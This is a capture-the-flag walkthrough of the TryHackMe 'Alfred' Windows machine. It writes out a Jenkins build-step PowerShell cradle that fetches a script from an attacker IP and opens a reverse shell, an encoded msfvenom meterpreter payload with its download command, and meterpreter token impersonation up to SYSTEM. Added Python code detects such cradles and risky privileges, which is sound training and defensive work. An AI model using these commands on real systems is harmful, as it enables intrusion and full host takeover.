THM - Alfred

Alfred

skibum 8/30/2020

Enumeration and initial shell

  1. NMAP scan

    nmap -sV -sT -Pn -oX nmap/intial <Machine_IP>
    
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-30 16:06 CDT
    Nmap scan report for <Machine_IP>
    Host is up (0.22s latency).
    Not shown: 997 filtered ports
    PORT     STATE SERVICE            VERSION
    80/tcp   open  http               Microsoft IIS httpd 7.5
    3389/tcp open  ssl/ms-wbt-server?
    8080/tcp open  http               Jetty 9.4.z-SNAPSHOT
    Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 36.91 seconds
    
  2. There are two ports with web servers on them:
    2.1. Port 80 serves only a memorial (RIP) page for Bruce Wayne.
    2.2. Port 8080 is a Jenkins login page.

  3. Check for default credentials.
    Test the username:password pair admin:admin

    • This worked to grant us access.
  4. From the main menu select the project in the center, then select Configure. This allows you to modify the build command that will be run on the underlying system.

    powershell iex (New-Object Net.WebClient).DownloadString('http://10.13.2.170:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.13.2.170 -Port 1337
    
  5. Run a python3 -m http.server and nc -nlvp 1337 before building the project.

  6. A user shell is now available.
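The build step above is a classic PowerShell download cradle, and a Jenkins server that lets an admin:admin login run arbitrary build commands will execute it as the Jenkins service account. As an added detection example (not part of the original writeup), the helper below scores command lines such as Jenkins build-step output or process-creation audit records against a small set of cradle indicators; the sample command lines, the indicator list and the weights are all my own constructed values.

```python
import re

# Constructed sample command lines (not captured from the page's target): the
# first two mirror the cradle and download shapes used in the writeup, the
# last two are benign build commands.
SAMPLE_COMMANDS = [
    "powershell iex (New-Object Net.WebClient).DownloadString('http://10.0.0.5:8000/x.ps1');"
    "Invoke-X -Reverse -IPAddress 10.0.0.5 -Port 1337",
    "powershell \"(New-Object System.Net.WebClient).Downloadfile('http://10.0.0.5:8000/a.exe','a.exe')\"",
    "powershell -File C:\\jenkins\\scripts\\build.ps1",
    "cmd /c mvn clean package",
]

# Each indicator: case-insensitive regex, weight, and a label for the report.
# Weights are arbitrary and chosen so that a download plus execution crosses
# the threshold while a single weak hint (a raw-IP URL) does not.
INDICATORS = [
    (re.compile(r"Net\.WebClient", re.I), 2, "WebClient object"),
    (re.compile(r"Download(String|File)\s*\(", re.I), 3, "remote download"),
    (re.compile(r"\b(iex|Invoke-Expression)\b", re.I), 3, "in-memory execution"),
    (re.compile(r"https?://\d{1,3}(\.\d{1,3}){3}", re.I), 1, "raw-IP URL"),
    (re.compile(r"-Reverse\b|-IPAddress\b|-Port\b", re.I), 2, "reverse-connection args"),
]


def score_command(cmd):
    """Return (score, [matched indicator labels]) for one command line."""
    matched = [(weight, label) for rx, weight, label in INDICATORS if rx.search(cmd)]
    return sum(w for w, _ in matched), [label for _, label in matched]


def flag_suspicious(cmds, threshold=4):
    """Return (command, score, labels) for every command at or above threshold."""
    flagged = []
    for cmd in cmds:
        score, labels = score_command(cmd)
        if score >= threshold:
            flagged.append((cmd, score, labels))
    return flagged


if __name__ == "__main__":
    for cmd, score, labels in flag_suspicious(SAMPLE_COMMANDS):
        print(f"[{score}] {', '.join(labels)}\n    {cmd}")
```

On the constructed sample the cradle scores 11 and the plain download 6, while both benign build commands score 0.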

Priv esc

  1. Generate a meterpreter reverse-shell payload

    msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.13.2.170 LPORT=9001 -f exe -o knockknock.exe  
    
  2. Download it onto the target from the shell

    powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.13.2.170:8000/knockknock.exe','knockknock.exe')" 
    
  3. Set the multi handler with the windows/meterpreter/reverse_tcp payload

  4. Run the exploit on the msfconsole and then run the exe on the shell.

  5. With the meterpreter shell up, check the privileges.

    PS> whoami /priv
    PRIVILEGES INFORMATION
    ----------------------
    
    Privilege Name                  Description                               State   
    =============================== ========================================= ========
    SeIncreaseQuotaPrivilege        Adjust memory quotas for a process        Disabled
    SeSecurityPrivilege             Manage auditing and security log          Disabled
    SeTakeOwnershipPrivilege        Take ownership of files or other objects  Disabled
    SeLoadDriverPrivilege           Load and unload device drivers            Disabled
    SeSystemProfilePrivilege        Profile system performance                Disabled
    SeSystemtimePrivilege           Change the system time                    Disabled
    SeProfileSingleProcessPrivilege Profile single process                    Disabled
    SeIncreaseBasePriorityPrivilege Increase scheduling priority              Disabled
    SeCreatePagefilePrivilege       Create a pagefile                         Disabled
    SeBackupPrivilege               Back up files and directories             Disabled
    SeRestorePrivilege              Restore files and directories             Disabled
    SeShutdownPrivilege             Shut down the system                      Disabled
    SeDebugPrivilege                Debug programs                            Enabled 
    SeSystemEnvironmentPrivilege    Modify firmware environment values        Disabled
    SeChangeNotifyPrivilege         Bypass traverse checking                  Enabled 
    SeRemoteShutdownPrivilege       Force shutdown from a remote system       Disabled
    SeUndockPrivilege               Remove computer from docking station      Disabled
    SeManageVolumePrivilege         Perform volume maintenance tasks          Disabled
    SeImpersonatePrivilege          Impersonate a client after authentication Enabled 
    SeCreateGlobalPrivilege         Create global objects                     Enabled 
    SeIncreaseWorkingSetPrivilege   Increase a process working set            Disabled
    SeTimeZonePrivilege             Change the time zone                      Disabled
    SeCreateSymbolicLinkPrivilege   Create symbolic links                     Disabled
    
  6. As SeImpersonatePrivilege is enabled, let's try to impersonate a token. Load the incognito module in the meterpreter session with: load incognito

  7. Let's list the tokens

    list_tokens -g
    [-] Warning: Not currently running as SYSTEM, not all tokens will be available
                 Call rev2self if primary process token is SYSTEM
    
    Delegation Tokens Available
    ========================================
    \
    BUILTIN\Administrators
    BUILTIN\IIS_IUSRS
    BUILTIN\Users
    NT AUTHORITY\Authenticated Users
    NT AUTHORITY\NTLM Authentication
    NT AUTHORITY\SERVICE
    NT AUTHORITY\This Organization
    NT AUTHORITY\WRITE RESTRICTED
    NT SERVICE\AppHostSvc
    NT SERVICE\AudioEndpointBuilder
    NT SERVICE\BFE
    NT SERVICE\CertPropSvc
    NT SERVICE\CscService
    NT SERVICE\Dnscache
    NT SERVICE\eventlog
    NT SERVICE\EventSystem
    NT SERVICE\FDResPub
    NT SERVICE\iphlpsvc
    NT SERVICE\LanmanServer
    NT SERVICE\MMCSS
    NT SERVICE\PcaSvc
    NT SERVICE\PlugPlay
    NT SERVICE\RpcEptMapper
    NT SERVICE\Schedule
    NT SERVICE\SENS
    NT SERVICE\SessionEnv
    NT SERVICE\Spooler
    NT SERVICE\TrkWks
    NT SERVICE\UmRdpService
    NT SERVICE\UxSms
    NT SERVICE\WdiSystemHost
    NT SERVICE\Winmgmt
    NT SERVICE\WSearch
    NT SERVICE\wuauserv
    
    Impersonation Tokens Available
    ========================================
    NT AUTHORITY\NETWORK
    NT SERVICE\AudioSrv
    NT SERVICE\CryptSvc
    NT SERVICE\DcomLaunch
    NT SERVICE\Dhcp
    NT SERVICE\DPS
    NT SERVICE\LanmanWorkstation
    NT SERVICE\lmhosts
    NT SERVICE\MpsSvc
    NT SERVICE\netprofm
    NT SERVICE\nsi
    NT SERVICE\PolicyAgent
    NT SERVICE\Power
    NT SERVICE\ShellHWDetection
    NT SERVICE\W32Time
    NT SERVICE\WdiServiceHost
    NT SERVICE\WinHttpAutoProxySvc
    NT SERVICE\wscsvc
    
  8. Since BUILTIN\Administrators is available, let's try to impersonate it: impersonate_token "BUILTIN\Administrators"

  9. We are now NT AUTHORITY\SYSTEM. Let's migrate into a SYSTEM process to make sure we keep it.

  10. Use the ps command to list the processes and look for the services.exe process. Its PID was 668!

  11. Now migrate into it: migrate 668

  12. P0wn3d!!! Now read the root.txt file at C:\Windows\System32\config
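The whole escalation hinges on the account Jenkins runs as holding SeImpersonatePrivilege (and SeDebugPrivilege) in the Enabled state, which is exactly what the whoami /priv output in step 5 shows. As an added audit helper, not part of the original writeup, the code below parses whoami /priv output in the same fixed-width format and reports which high-risk privileges are enabled, so a defender can check service accounts before an attacker does; the excerpt is constructed from the page's table and the HIGH_RISK set is my own selection.

```python
import re

# Constructed excerpt in the same fixed-width layout as `whoami /priv` output.
WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                  Description                               State
=============================== ========================================= ========
SeSecurityPrivilege             Manage auditing and security log          Disabled
SeDebugPrivilege                Debug programs                            Enabled
SeChangeNotifyPrivilege         Bypass traverse checking                  Enabled
SeImpersonatePrivilege          Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege         Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege   Increase a process working set            Disabled
"""

# Privileges that let the holder act in another security context or at kernel
# level; a service account with any of these Enabled deserves a second look.
HIGH_RISK = {
    "SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege", "SeDebugPrivilege",
    "SeTakeOwnershipPrivilege", "SeBackupPrivilege", "SeRestorePrivilege",
    "SeLoadDriverPrivilege",
}


def parse_whoami_priv(text):
    """Return {privilege_name: (description, state)} from whoami /priv output.

    Column boundaries are taken from the '===' separator line, so the parser
    does not depend on a fixed number of spaces between columns."""
    lines = text.splitlines()
    sep_idx = next(i for i, line in enumerate(lines) if line.startswith("="))
    starts = [m.start() for m in re.finditer(r"=+", lines[sep_idx])]
    bounds = list(zip(starts, starts[1:] + [None]))  # (start, end) per column
    result = {}
    for line in lines[sep_idx + 1:]:
        if not line.strip():
            continue
        name, desc, state = (line[a:b].strip() for a, b in bounds)
        result[name] = (desc, state)
    return result


def enabled_high_risk(text):
    """Names of HIGH_RISK privileges whose state is Enabled, sorted."""
    privs = parse_whoami_priv(text)
    return sorted(n for n, (_, state) in privs.items()
                  if state == "Enabled" and n in HIGH_RISK)


if __name__ == "__main__":
    print("Enabled high-risk privileges:", enabled_high_risk(WHOAMI_PRIV))
```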

